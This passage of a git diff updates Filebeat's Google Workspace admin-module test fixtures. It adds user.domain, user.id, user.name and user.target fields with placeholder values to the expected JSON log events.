+ "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1007,7 +1064,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1058,7 +1118,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1108,7 +1171,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1158,7 +1224,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1210,7 +1279,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1263,7 +1335,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1314,7 +1389,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1366,7 +1444,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1417,7 +1498,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1466,7 +1550,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1517,7 +1604,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1566,7 +1656,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1617,7 +1710,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1669,7 +1765,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1720,7 +1819,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1769,7 +1871,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1818,7 +1923,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1869,7 +1977,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1920,7 +2031,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1970,7 +2084,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2020,7 +2137,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2071,7 +2191,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2120,7 +2243,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2169,7 +2295,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2220,7 +2349,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2271,7 +2403,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2322,7 +2457,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2373,7 +2511,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2424,7 +2565,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2472,7 +2616,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2523,7 +2670,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2574,7 +2724,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2625,7 +2778,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2675,7 +2831,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2724,7 +2883,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2775,7 +2937,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2826,7 +2994,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2877,7 +3048,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2926,7 +3100,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2975,7 +3152,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3026,7 +3206,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3077,7 +3260,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3130,7 +3316,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3181,7 +3370,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3232,7 +3424,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3283,7 +3478,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3335,7 +3533,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3385,7 +3586,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3435,7 +3639,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3486,7 +3693,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3536,7 +3746,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3585,7 +3798,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3634,7 +3850,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3683,7 +3902,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3732,7 +3954,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3782,7 +4007,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3833,7 +4061,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3883,7 +4114,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3933,7 +4167,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3983,7 +4220,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4033,7 +4273,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4083,7 +4326,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4134,7 +4380,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4184,7 +4433,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4232,7 +4484,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -4281,6 +4536,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json index 5d748bc3990f..86bbb3cbcbb6 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -102,7 +105,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -155,7 +161,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -212,7 +224,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -265,7 +280,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -318,7 +336,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -371,7 +392,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -421,7 +445,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -471,6 +498,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json index d322acefbf96..d9c9e452f409 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json @@ -49,7 +49,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -101,7 +104,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -153,7 +159,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -202,7 +211,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -256,7 +268,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -310,7 +330,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -366,7 +394,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -422,7 +458,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -478,7 +522,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -529,7 +581,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -578,7 +633,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -631,7 +689,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -686,7 +747,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -740,6 +804,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json index 9a6738eb30b0..c4dd9cdd54cc 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -99,7 +102,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -151,7 +157,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -202,7 +214,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -255,7 +270,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -306,7 +327,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -358,7 +382,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -410,6 +440,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json index 436ec466cf4c..099e46ceb466 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json @@ -52,7 +52,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -107,7 +113,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -158,7 +170,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -207,7 +222,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -257,7 +275,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -307,7 +328,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -357,7 +381,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -407,7 +434,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -462,7 +492,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -512,7 +545,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -564,7 +600,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -620,7 +659,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -672,7 +714,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -725,7 +770,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -778,7 +829,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -831,7 +888,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -884,7 +947,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -938,7 +1007,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -988,7 +1060,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1039,7 +1114,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1090,7 +1168,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1141,7 +1222,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1192,7 +1276,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1243,7 +1330,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1291,7 +1381,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1339,7 +1432,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1387,7 +1483,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1435,7 +1534,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1488,7 +1590,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": 